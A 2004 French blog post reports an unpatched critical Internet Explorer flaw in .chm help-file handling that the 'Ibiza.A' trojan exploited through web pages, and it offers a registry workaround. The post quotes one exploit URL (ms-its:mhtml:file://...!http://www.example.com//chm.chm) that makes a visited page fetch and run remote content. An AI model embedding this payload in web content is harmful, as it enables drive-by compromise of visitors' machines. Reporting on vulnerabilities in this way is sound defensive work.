Vulnérabilité critique IE non patchée
Par Mozinet, jeudi 19 février 2004 à 05:25 :: Navigateurs :: #71 ::
Après la vulnérabilité non critique d'IE 5 découverte grâce aux sources volées, en voici une critique, non patchée concernant aussi Internet Explorer 6. Une simple page HTML suffirait à un attaquant pour télécharger puis exécuter, sur la machine vulnérable, un fichier malicieux. Selon la liste K-Otik :
Cette faille se situe au niveau du traitement des fichiers d'aide
.chm
, elle est actuellement exploitée par un trojan « Ibiza.A » qui s'installe automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page HTML malicieuse).
ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm
La solution préconisée est de renommer l'entrée dans le registre : HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its
. Il est quand même plus simple, plus sûr et plus agréable de ne plus utiliser Internet Explorer.
Ce billet a été modifié en dernier le 19 February 2004 à 05:27:55.
Commentaires
1. Le jeudi 19 février 2004 à 20:59, par Darken
Ajouter un commentaire
Les commentaires pour ce billet sont fermés.